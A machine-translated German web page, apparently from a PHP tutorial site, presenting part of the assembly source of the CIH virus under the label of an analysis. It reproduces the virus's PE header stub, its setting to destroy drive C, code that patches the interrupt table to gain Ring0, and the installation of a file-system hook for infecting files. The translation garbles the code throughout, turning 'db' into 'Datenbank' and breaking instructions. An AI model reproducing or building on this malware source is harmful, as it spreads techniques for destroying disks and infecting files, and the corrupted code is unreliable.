Heim >Backend-Entwicklung >PHP-Tutorial >Analyse von Beispielen für den Quellcode von Virenprogrammen – CIH-Virus[2]

Analyse von Beispielen für den Quellcode von Virenprogrammen – CIH-Virus[2]

黄舟
黄舟Original
2017-01-17 11:15:082268Durchsuche

Analyse von Beispielen für den Quellcode von Virenprogrammen – CIH-Virus[2]

OriginalAppEXE SEGMENT
 
 ;Header der ausführbaren Datei im PE-Format
 FileHeader:
 db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 0. 04h , 000h , 000h, 000h, 0ffh, 0ffh, 000h, 000h
DB 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 000h, 000h, 000h, 000h
 db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db. 000h, 000h, 000h, 000h, 080h 000h, 000h, 000h 068h
db 061h , 06dh, 0 20h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh 🎜> db 06dh, 06fh, 064h, 0 65h, 02eh, 00dh, 00dh , 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h h, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db. 000 Std., 000 Std., 000 Std., 000 Std., 000 Std , 000h, 000h, 000h, 000h
 db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
Datenbank 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 000h, 000h, 000h, 002h, 000h, 000h
Datenbank 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
Datenbank 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h Datenbank 000h, 000h, 010h, 000h, 000, 010, 000, 000 0h, 000h, 000h
db 000h ,000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h, 000h, 000h, 000h 000h 00h, 000h, 000h
 db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
Datenbank 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
 db 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
DB 00 0h, 010 Std., 000 Std., 000 Std., 000 Std , 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h
 db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h , 000h, 000h, 000h
 db 000h ,000h, 000h, 000h, 000h, 000h, 000h, 000h 00h, 000h, 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
 db 000h. , 000h, 000h, 000h, 000h, 000h, 000h, 000h
 db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
 db 000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h
db 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h
 db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize

OriginalAppEXE ENDS

; Virenprogramm startet
TRUE = 1
FALSE = 0
DEBUG = FALSE
 
 ; Markieren Sie seine Versionsnummer als Version 1.4
MajorVirusVersion = 1; Hauptversionsnummer
MinorVirusVersion = 4; Nebenversionsnummer
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion; Synthetische Versionsnummer
 
 IF DEBUG;Ob debuggen?
 FirstKillHardDiskNumber = 81h;Laufwerk D zerstören
HookExceptionNumber = 05h ; Interrupt-Nummer 5 verwenden
ELSE
FirstKillHardDiskNumber = 80h ; Laufwerk C zerstören
HookxceptionNumber = 03h ; Interrupt-Nummer 3 verwenden

FileNameBufferSize = 7fh
 
; Virencode-Segment beginnt
VirusGame-SEGMENT

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame
> MyVirusStart :
push ebp

; Systemausnahmebehandlung ändern, um die Generierung von Fehlermeldungen zu vermeiden
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax , fs: [ebx]
 
 call @0
 
 @0:
 pop ebx; Verwenden Sie diesen Offset + relativen Offset, um die absolute Adresse
lea zu erhalten ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax

; Ändern Sie die Interrupt-Beschreibungstabelle, um die höchste Ring0-Berechtigung zu erhalten
push eax
sidt [esp- 02h] ; Basisadresse der Interrupt-Beschreibungstabelle für ebx abrufen
pop ebx ; add ebx, HookExceptionNumber*08h+04h ; Berechnen Sie die Basisadresse des Interrupts, der für ebx verwendet werden soll

cli ;Interrupts vor dem Ändern ausschalten
esi, MyExceptionHook-@1[ecx]
 
push esi ist die Adresse der Viren-Interrupt-Routine

mov [ebx-04h] , si;
shr esi, 16; Ändern Sie die Ausnahme
mov [ebx+02h], si ; Ändern Sie die Interrupt-Basisadresse, um auf die Virus-Interrupt-Routine zu verweisen

pop esi

; Erzeuge eine Ausnahme, die in die Ring0-Ebene eintritt
int HookExceptionNumber ; to Interrupt, um in die Ring0-Ebene einzutreten
ReturnAddressOfEndException = $

; Alle Virencodes zusammenführen
push esi
mov esi, eax; esi zeigt auf den Anfang des Virus

; Loop Copy
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]

rep movsb ; erste Adresse des zugewiesenen Systemspeichers
sub eax, 08h
mov esi, [eax]
 or esi, esi
 jz QuitLoopOfMergeAllVirusCodeSection; ZF = 1
 
 jmp LoopOfMergeAllVirusCodeSection;Copy the nächster Absatz
 
 QuitLoopOfMergeAllVirusCodeSection:
pop esi
int HookExceptionNumber
 
 ; Ausnahmebehandlung speichern
 ReadyRestoreSE:
 sti;Open interrupt
 xor ebx, ebx, Der Virus stoppt die Ausführung und springt direkt zum ursprünglichen Programm
StopToRunVirusCode:
@1 = StopToRunVirusCode

xor ebx, ebx
mov eax, fs:[ebx]
mov esp , [eax]
 
 RestoreSE:
 pop dword ptr fs:[ebx]
 pop eax
 
 ; Zum Originalprogramm springen und normal ausführen
 pop ebp
 
 push 00401000h
 OriginalAddressOfEntryPoint = $-4;Schiebt die Startadresse des Originalprogramms auf den Stapel
 ret;Kehrt als Unterprogramm zum Anfang des Originalprogramms zurück
 ; Virus-Initialisierungsmodul
 MyExceptionHook:
 @2 = MyExceptionHook
 
 jz InstallMyFileSystemApiHook; Wenn der Virencode kopiert wurde
 ; Gehen Sie zum Programm, um den System-Hook zu installieren
 
mov ecx , dr0 ; Überprüfen Sie, ob dr0 gesetzt wurde (dr0 ist das Virus-Residenz-Flag)
jecxz AllocateSystemMemoryPage ; Wenn nicht gesetzt, ordnen Sie Systemspeicher zu

fügen Sie dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
Zurück zum ursprünglichen Programm
ExitRing0Init:
mov [ebx-04h], bp ; Shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ; ursprüngliche Interrupt-Basisadresse
 
 iretd;Interrupt-Rückgabe
 
 ;Zu verwendenden Systemspeicher zuweisen
 AllocateSystemMemoryPage:
 mov dr0, ebx;Setzen Sie das Flag der Virenresidenz dr0
 push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;Call method ULONG EXTERN _PageAllocate(ULONG nPages,
; ULONG VM, ULONG AlignMask,
; $
dd 00010053h;Eax-, ecx-, edx- und Flag-Register verwenden
esp hinzufügen, 08h*04h;Stapelzeiger wiederherstellen

xchg edi, eax;edi zeigt auf die erste Adresse des zugewiesenen Systemspeichers
lea eax , MyVirusStart-@2[esi] ;eax zeigt auf den Start des Virus
 
iretd ;Interrupt beenden

; Initialisieren Sie den Dateisystem-Hook
InstallMyFileSystemApiHook:
lea eax , FileSystemApiHook-@6 [edi] ; Zeigen Sie auf die erste Adresse des Dateisystem-Hook-Programms
 
 push eax;
 int 20h; Vxd ruft IFSMgr_InstallFileSystemApiHook
 dd 00 auf 400067h; Verwenden Sie eax, ecx, edx und flags register
 
mov dr0, eax; Speichern Sie die erste Adresse des ursprünglichen Dateisystem-Hook-Programms in dr0
pop eax entspricht der ersten Adresse des Dateisystem-Hook-Programms

; Speichern Sie den ursprünglichen IFSMgr_InstallFileSystemApiHook-Funktionsaufruf-Eintrag
 mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx] ;edx ist der Eintrag von IFSMgr_InstallFileSystemApiHook
mov OldInstallFileSystemApiHook-@3[ eax], edx
 
; IFSMGR_INSTALLFILESYSTEMAPIHOOK-Eingang ändern
Lea Eax, InstallfileSystemapihook-@3 [Eax]
; um auf InstallfileSystemapihook
zu verweisen;


Das Obige ist der Inhalt der Beispielanalyse des Virenprogramm-Quellcodes – CIH-Virus [2]. Weitere verwandte Inhalte finden Sie auf der chinesischen PHP-Website (www.php.cn). )!

Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn